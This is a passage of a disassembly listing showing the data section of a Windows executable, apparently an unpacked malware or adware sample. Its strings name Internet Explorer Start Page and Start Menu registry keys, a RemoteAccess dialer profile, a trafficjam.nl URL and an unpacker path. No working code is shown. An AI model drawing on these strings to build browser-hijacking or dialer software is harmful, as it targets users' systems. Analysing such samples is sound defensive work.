; WinMain(x,x,x,x)+A1�o ...
dword_412074 dd 0 ; DATA XREF: sub_40E979:loc_40E9B0�r
; sub_40E979+49�o ...
dd 0
dword_41207C dd 0 ; DATA XREF: sub_40E979+40�r
; sub_40E979+53�w
dword_412080 dd 6 dup(0) ; DATA XREF: sub_40E930�o
; sub_40E979:loc_40E9E5�o
dword_412098 dd 0 ; DATA XREF: sub_40E930+24�w
; sub_40E979:loc_40E9D6�r
dd offset dword_4124E4
dword_4120A0 dd 0C8h ; DATA XREF: WinMain(x,x,x,x)+3C�w
dword_4120A4 dd 5Ch ; DATA XREF: WinMain(x,x,x,x)+F8�w
dd 0
off_4120AC dd offset aSoftwareMicr_0 ; DATA XREF: sub_403350+4CF�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aDesktop ; "Desktop"
off_4120B4 dd offset aStartMenu ; DATA XREF: sub_403350+4C9�r
; "Start Menu"
dd offset aSoftwareMicr_2 ; "Software\\Microsoft\\Internet Explorer\\Ma"...
dd offset aStartPage ; "Start Page"
off_4120C0 dd offset aRemoteaccess ; DATA XREF: sub_407540+16�r
; sub_407AF0:loc_407C99�r ...
; "RemoteAccess"
off_4120C4 dd offset aDefault ; DATA XREF: sub_407540+39�r
; sub_407540+62�r ...
; "Default"
off_4120C8 dd offset aInternetprofil ; DATA XREF: sub_407540:loc_4075EE�r
; sub_407540+D1�r ...
; "InternetProfile"
off_4120CC dd offset aSoftwareMicr_1 ; DATA XREF: sub_403350+176�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
off_4120D0 dd offset aProgramfilesdi ; DATA XREF: sub_403350+171�r
; "ProgramFilesDir"
off_4120D4 dd offset aCarlson ; DATA XREF: sub_403350:loc_40356B�r
; "Carlson"
off_4120D8 dd offset aHttpWww_traffi ; DATA XREF: sub_407D40+DD�r
; "http://www.trafficjam.nl/?failed=initia"...
byte_4120DC db 1 ; DATA XREF: sub_406110:loc_40613C�r
; sub_406110+48�w
align 10h
dword_4120E0 dd 19930520h, 3 dup(0) ; DATA XREF: .text:0040A95F�o
; __NLG_Notify+2�o
off_4120F0 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_4120F4 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r
dword_4120F8 dd 38811FA1h ; DATA XREF: sub_40A645+B�r sub_40B5F4�r ...
align 10h
dd 10h, 3 dup(0)
dword_412110 dd 1 ; DATA XREF: __dosmaperr:loc_40CBA0�r
dword_412114 dd 16h ; DATA XREF: __dosmaperr:loc_40CBC4�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_412278 dd offset asc_40FE08 ; DATA XREF: _strtoxl:loc_40B139�r
; _strtoxl:loc_40B1CE�r ...
; " ((((( H"
dd offset dword_410008+2
dword_412280 dd 1 ; DATA XREF: _strtoxl:loc_40B121�r
; __ismbcspace:loc_40E79F�r
dd 2Eh, 1, 0
dword_412290 dd 2 ; DATA XREF: __NMSG_WRITE:loc_40CD7A�r
; __NMSG_WRITE+3A�r
off_412294 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41055Ch, 9, 410530h, 0Ah, 410498h, 10h, 41046Ch
dd 11h, 41043Ch, 12h, 410418h, 13h, 4103ECh, 18h, 4103B4h
dd 19h, 41038Ch, 1Ah, 410354h, 1Bh, 41031Ch, 1Ch, 4102F4h
dd 1Dh, 410250h, 78h, 410240h, 79h, 410230h, 7Ah, 410220h
dd 0FCh, 41021Ch, 0FFh, 41020Ch
dword_412328 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_4123A0 dd 3 ; DATA XREF: __XcptFilter+84�r
dword_4123A4 dd 7 ; DATA XREF: __XcptFilter+89�r
dword_4123A8 dd 0Ah ; DATA XREF: __XcptFilter+6�r
dword_4123AC dd 8Ch ; DATA XREF: __XcptFilter+B2�r
; __XcptFilter+BA�w ...
dd 0FFFFFFFFh, 0A80h, 1, 0
byte_4123C0 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 8
dword_4123C8 dd 3A4h ; DATA XREF: __setmbcp:loc_40DF0E�r
dword_4123CC dd 82798260h ; DATA XREF: __setmbcp+15C�r
dd 21h, 0
dword_4123D8 dd 0DFA6h ; DATA XREF: __setmbcp+100�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 3 dup(0)
off_4124C0 dd offset off_412070 ; DATA XREF: sub_40E930+2E�w
dword_4124C4 dd 9B4AA441h ; DATA XREF: sub_401A80+A�w
dword_4124C8 dd 11D59EBFh ; DATA XREF: sub_401A80+13�w
dword_4124CC dd 5000118Ch ; DATA XREF: sub_401A80+1C�w
dword_4124D0 dd 0F55749DAh ; DATA XREF: sub_401A80+25�w
off_4124D4 dd offset off_412070 ; DATA XREF: sub_40E930+5�w
dword_4124D8 dd 0 ; DATA XREF: sub_4053B0:loc_405401�r
dword_4124DC dd 0 ; DATA XREF: sub_405320+65�r
byte_4124E0 db 0 ; DATA XREF: sub_40A5B8+34�w
; sub_40A645+94�w ...
align 4
dword_4124E4 dd 9 dup(0) ; DATA XREF: WinMain(x,x,x,x)+21�o
; .data:0041209C�o
dword_412508 dd 0 ; DATA XREF: sub_401650+10�w
; sub_401650:loc_4016C0�r
word_41250C dw 0 ; DATA XREF: sub_401650+1A�w
; sub_401650:loc_4016DB�r
align 10h
dword_412510 dd 0 ; DATA XREF: sub_401650+23�w
word_412514 dw 0 ; DATA XREF: sub_401650+2D�w
align 4
dword_412518 dd 0 ; DATA XREF: sub_401650+36�w
word_41251C dw 0 ; DATA XREF: sub_401650+40�w
align 10h
dword_412520 dd 0 ; DATA XREF: sub_401650+49�w
word_412524 dw 0 ; DATA XREF: sub_401650+53�w
align 4
dword_412528 dd 0 ; DATA XREF: sub_401650�r sub_401650+9�w
dword_41252C dd 0 ; DATA XREF: sub_405EB0+4�r
; sub_405EB0+1F�r ...
dword_412530 dd 3807E0h ; DATA XREF: WinMain(x,x,x,x)+171�w
; WinMain(x,x,x,x)+184�r ...
dword_412534 dd 0 ; DATA XREF: sub_405CE0�r
; sub_405CE0+1A�w ...
dword_412538 dd 0 ; DATA XREF: sub_408350:loc_4085AF�w
; sub_408350+2A3�r ...
dword_41253C dd 0 ; DATA XREF: .text:loc_409B80�r
; sub_409D70+6E�w
dword_412540 dd 0 ; DATA XREF: sub_402210+7F�o
; sub_4022A0:loc_4022D2�o ...
dd 400000h
off_412548 dd offset dword_4108EC ; DATA XREF: sub_401A80:loc_401ACF�r
; sub_402170:loc_4021A3�r
off_41254C dd offset dword_4108EC ; DATA XREF: sub_401A80+55�r
; sub_401A80:loc_401AEB�r ...
dd 6 dup(0)
dword_412568 dd 3Ch ; DATA XREF: sub_40E979:loc_40E98F�o
; sub_40E979:loc_40EA43�o
dword_41256C dd 400000h ; DATA XREF: sub_4050C0+64�r
; sub_405320+6F�r ...
dword_412570 dd 400000h ; DATA XREF: WinMain(x,x,x,x)+198�r
dd 1, 710h, 40FC9Ch, 9 dup(0)
dword_4125A4 dd 2 ; DATA XREF: _strtoxl+165�w
; __dosmaperr+24�w ...
dword_4125A8 dd 2 ; DATA XREF: __dosmaperr+4�w
align 10h
dword_4125B0 dd 2 ; DATA XREF: __resetstkoflw+34�r
; __resetstkoflw+B5�r ...
dword_4125B4 dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_4125B8 dd 501h ; DATA XREF: start+65�w
dword_4125BC dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_4125C0 dd 1 ; DATA XREF: start+3A�w
dword_4125C4 dd 1 ; DATA XREF: __setargv+8F�w
dword_4125C8 dd 380B20h ; DATA XREF: __setargv+95�w
align 10h
; void *dword_4125D0
dword_4125D0 dd 380B40h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_40D183�r ...
align 10h
off_4125E0 dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4125E8 db 0 ; DATA XREF: _doexit+2D�w
align 4
dword_4125EC dd 1 ; DATA XREF: _doexit+27�w
dword_4125F0 dd 1 ; DATA XREF: _doexit+7�r _doexit+B0�w
align 8
dword_4125F8 dd 3F1BAF20h ; DATA XREF: _clock+1E�r
; ___inittime+27�w
dword_4125FC dd 1C811B9h ; DATA XREF: _clock+27�r
; ___inittime+2C�w
; void *Memory
Memory dd 0 ; DATA XREF: start+11C�w
; __setenvp:loc_40D0E4�r ...
align 8
dword_412608 dd 0 ; DATA XREF: __amsg_exit�r start+D2�r ...
dword_41260C dd 0 ; DATA XREF: __callnewh�r
dword_412610 dd 0 ; DATA XREF: _malloc�r
; _realloc:loc_40AC1D�r ...
align 8
dword_412618 dd 0 ; DATA XREF: __ValidateEH3RN:loc_40C62D�r
; __ValidateEH3RN+13F�r ...
align 10h
dword_412620 dd 0 ; DATA XREF: __ValidateEH3RN:loc_40C640�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_412660 dd 0 ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_412664 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_412668 dd 0 ; DATA XREF: __XcptFilter+68�r
; __XcptFilter+73�w ...
align 10h
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_4125E0�o
align 4
dd 3Ah dup(0)
byte_412774 db 0 ; DATA XREF: __setargv+23�w
align 4
dword_412778 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_41277C dd 0 ; DATA XREF: ___security_error_handler+17�r
dword_412780 dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
dd 2 dup(0)
; int dword_41278C
dword_41278C dd 0 ; DATA XREF: __isctype+50�r
; ___crtGetStringTypeA+14A�r ...
dd 3 dup(0)
; int dword_41279C
dword_41279C dd 0 ; DATA XREF: __isctype+59�r
; ___crtGetStringTypeA+75�r ...
dd 0
dword_4127A4 dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_4127A8 dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_40DAA1�r
dword_4127AC dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_4127B0 dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_40DA5C�r
dword_4127B4 dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_4127B8 dd 1 ; DATA XREF: __setmbcp+19�w
; __setmbcp+21�w ...
dword_4127BC dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
; int dword_4127C0
dword_4127C0 dd 0 ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_4127C4 dd 0 ; DATA XREF: _setSBCS+15�w
; __setmbcp+14D�w ...
dd 6 dup(0)
byte_4127E0 db 0 ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_4127E1 db 0 ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_4128E4
dword_4128E4 dd 4E4h ; DATA XREF: _setSBCS+10�w
; _setSBUpLow+16�r ...
align 10h
dword_4128F0 dd 4 dup(0) ; DATA XREF: _setSBCS+1F�o
; __setmbcp+162�o ...
byte_412900 db 0 ; DATA XREF: _setSBUpLow:loc_40DE19�w
; _setSBUpLow:loc_40DE36�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_412A00 dd 20h ; DATA XREF: __ioinit+1F�w
; __ioinit:loc_40D552�r ...
dd 7 dup(0)
dword_412A20 dd 380650h ; DATA XREF: __ioinit:loc_40D4E3�w
; __ioinit+3C�r ...
dword_412A24 dd 3Fh dup(0) ; DATA XREF: __ioinit+91�o
; void *dword_412B20
dword_412B20 dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_412B24 dd 0 ; DATA XREF: ___sbh_heap_init+28�w
; ___sbh_find_block�r ...
dword_412B28 dd 0 ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_412B2C dd 0 ; DATA XREF: __heap_alloc+E�r
; _realloc+58�r ...
dword_412B30 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_412B34 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_412B38 dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
dword_412B3C dd 380000h ; DATA XREF: __heap_alloc+38�r
; _free+2A�r ...
dword_412B40 dd 1 ; DATA XREF: __heap_alloc�r
; __heap_alloc:loc_40A716�r ...
dword_412B44 dd 142340h ; DATA XREF: start+112�w
; __wincmdln:loc_40D086�r ...
dword_412B48 dd 1 ; DATA XREF: __setenvp+9F�w
dword_412B4C dd 380754h ; DATA XREF: _doexit+3E�r
; _doexit:loc_40AD62�r ...
; void *dword_412B50
dword_412B50 dd 380758h ; DATA XREF: _doexit+34�r _doexit+5A�r ...
dword_412B54 dd 1 ; DATA XREF: __wincmdln+4�r
; __setenvp+3�r ...
dword_412B58 dd 0 ; DATA XREF: __cinit�r
_data ends
; Section 5. (virtual address 00016000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00015A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 416000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start